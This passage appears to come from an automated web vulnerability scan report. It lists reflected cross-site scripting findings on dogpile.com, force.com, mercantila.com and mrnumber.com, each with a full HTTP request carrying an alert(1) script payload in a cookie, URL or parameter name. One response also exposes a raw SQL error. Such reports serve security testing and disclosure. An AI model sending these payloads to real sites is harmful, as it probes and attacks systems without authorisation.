Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com93152"-alert(1)-"816df919a4f; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response (redirected)

2.143. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/GE+Zero+Taxes

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7886"-alert(1)-"78b4217b136 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.comc7886"-alert(1)-"78b4217b136

Response

2.144. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66b73"-alert(1)-"6a66de51dba was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com66b73"-alert(1)-"6a66de51dba; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

2.145. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b56e7"-alert(1)-"2b8c3a90ea was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11?rfcp=TopNavigation&rfcid=407&qcat=Web6c5ea\'%3balert(1)//e445c104ee1&qkw=MLB%20Schedule&newtxn=false&qcoll=Relevance&_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fe86ba7b839e447e97c1c16a3af0cb01&ActionId=5b843be01d96476c9873c16a3af0cb01&CookieDomain=.dogpile.comb56e7"-alert(1)-"2b8c3a90ea

Response

2.146. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a4fb"-alert(1)-"9c0762a1d15 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=fe86ba7b839e447e97c1c16a3af0cb01&CookieDomain=.dogpile.com6a4fb"-alert(1)-"9c0762a1d15

Response

2.147. http://www.dogpile.com/dogpile_rss/ws/index/ [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193eb"-alert(1)-"b095a032310 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/index/?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com193eb"-alert(1)-"b095a032310

Response

2.148. http://www.dogpile.com/favicon.ico [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/favicon.ico

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55c43"-alert(1)-"46f043feb84 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=5b843be01d96476c9873c16a3af0cb01&ActionId=d139d0f78e1a40d2844cc16a3af0cb01&CookieDomain=.dogpile.com55c43"-alert(1)-"46f043feb84; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:07:45 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

2.149. http://www.dogpile.com/info.dogpl.rss/Web6c5ea//' [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/info.dogpl.rss/Web6c5ea//'

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df86"-alert(1)-"c22c881b4b3 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/Web6c5ea//';Alert(%22Xss%22)//E445c104ee1/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com1df86"-alert(1)-"c22c881b4b3

Response (redirected)

2.150. http://www.dogpile.com/info.dogpl.rss/web/GE+Zero+Taxes [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/info.dogpl.rss/web/GE+Zero+Taxes

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae01e"-alert(1)-"a0d5d5414f7 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.comae01e"-alert(1)-"a0d5d5414f7

Response (redirected)

2.151. http://www.dogpile.com/info.dogpl.rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/info.dogpl.rss/web/Go+Daddy+CEO+Elephant

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cfb5"-alert(1)-"011a7e5ee80 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com6cfb5"-alert(1)-"011a7e5ee80

Response (redirected)

2.152. http://www.dogpile.com/info.dogpl.rss/web/MLB+Schedule [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/info.dogpl.rss/web/MLB+Schedule

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f96a"-alert(1)-"0cf0cd42d43 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com2f96a"-alert(1)-"0cf0cd42d43

Response (redirected)

2.153. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.force.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31872<script>alert(1)</script>9528ad1c941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?31872<script>alert(1)</script>9528ad1c941=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1
Date: Fri, 01 Apr 2011 15:29:52 GMT
Content-Length: 193

The URL has moved to <a href="http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1">http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1</a>

2.154. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.force.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e087"><script>alert(1)</script>f5d56d88177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9e087"><script>alert(1)</script>f5d56d88177=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1
Date: Fri, 01 Apr 2011 15:29:51 GMT
Content-Length: 197

The URL has moved to <a href="http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1">http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1</a>

2.155. http://www.mercantila.com/website/shoppingcart/cartbroker.php [merc_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mercantila.com
Path:	/website/shoppingcart/cartbroker.php

Issue detail

The value of the merc_uid cookie is copied into the HTML document as plain text between tags. The payload b3c36<img%20src%3da%20onerror%3dalert(1)>bd9912f2169 was submitted in the merc_uid cookie. This input was echoed as b3c36<img src=a onerror=alert(1)>bd9912f2169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /website/shoppingcart/cartbroker.php HTTP/1.1
Host: www.mercantila.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
Content-Length: 22
Origin: http://www.mercantila.com
X-Prototype-Version: 1.6.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mercServeBucket=merc-resources-gzip; mercServeCloud=dklnxffcpkmhm; PHPSESSID=1191364907574890868; merc_uid=6451364907577995808b3c36<img%20src%3da%20onerror%3dalert(1)>bd9912f2169; __utmz=1.1301677342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.940387525.1301677342.1301677342.1301677342.1; __utmc=1; __utmb=1.1.10.1301677342

Action=getCartCount&_=

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:02:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 997
Content-Type: text/html; charset=UTF-8

{"marr_data":"Error in query executionSELECT\r\n internal_code as INTERNAL_CODE, ref_product_id as REF_PRODUCT_ID, relation_type as RELATION_TYPE,\r\n quantity as
...[SNIP]...
s\r\n WHERE\r\n ref_cart_id = {\"marr_data\":\"Error in query executionSELECT internal_code, status FROM maya_cart WHERE status = 0 AND user_id = 6451364907577995808b3c36<img src=a onerror=alert(1)>bd9912f2169\",\"marr_request_param\":null,\"mint_status_code\":0,\"mstr_status_message\":null} \r\n ORDER BY\r\n internal_code","marr_request_param":null,"mint_status_code":0,"
...[SNIP]...

2.156. http://www.mrnumber.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mrnumber.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 85bf8<script>alert(1)</script>c6dc492760e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico85bf8<script>alert(1)</script>c6dc492760e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e
Content-Type: text/html
Content-Length: 262

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e">http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e</a>
...[SNIP]...

2.157. http://www.mrnumber.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mrnumber.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fff9"><script>alert(1)</script>496210cd2cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico8fff9"><script>alert(1)</script>496210cd2cd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico8fff9"><script>alert(1)</script>496210cd2cd
Content-Type: text/html
Content-Length: 266

